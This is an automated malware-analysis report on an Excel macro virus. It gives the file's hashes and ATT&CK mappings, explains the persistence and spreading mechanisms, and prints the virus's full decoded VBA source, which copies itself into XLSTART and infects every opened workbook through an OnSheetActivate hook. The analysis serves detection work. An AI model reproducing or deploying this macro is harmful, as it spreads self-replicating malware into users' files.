Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2590bd6caa7f5b18…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 37.5 KB
Created: 2014-04-14 09:00:00
Authoring application: Microsoft Excel
First seen: 2014-07-15
MD5: 1206f05b8b24c98b948b5a0a1fac0226
SHA-1: f247cafc03464aae0590c2b7ea4950a18cad286b
SHA-256: 2590bd6caa7f5b18a99992ed206184e97220071e8758be52292fca8fbadf3611
Risk Score: 108

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The VBA macro code explicitly copies the current workbook into the Excel startup folder (Application.StartupPath) as '1006(潘).xls', establishing persistence. It also installs an 'OnSheetActivate' hook that infects other workbooks, indicating a spreading mechanism. The presence of Auto_Open together with the workbook-infection heuristics strongly suggests macro-based malware designed for persistence and propagation.

Heuristics (4)

  • VBA macros detected (severity: medium; 3 related findings; rule ID: OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA copies the workbook into the Excel XLSTART startup folder (severity: high; rule ID: OLE_VBA_XLSTART_PERSISTENCE)
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script:
      If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006(潘).xls") = "" Then
  • VBA infects other workbooks via an OnSheetActivate copy hook (severity: high; rule ID: OLE_VBA_WORKBOOK_INFECTION_SPREADER)
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script:
      Application.OnSheetActivate = "1006(潘).xls!acop"
  • Auto_Open macro (severity: low; rule ID: OLE_VBA_AUTO)
    Document defines an Auto_Open macro, which Excel runs automatically when the workbook is opened
    Matched line in script:
      Sub auto_open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   1162 bytes
SHA-256: 67338e26aeb9703c06ee99142c5e7afce84d11d3efccbe09a8a42efdf3fbc396

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "StartUp"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006(潘).xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006(潘).xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("1006(潘).xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "1006(潘).xls!acop"

End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("1006(潘).xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True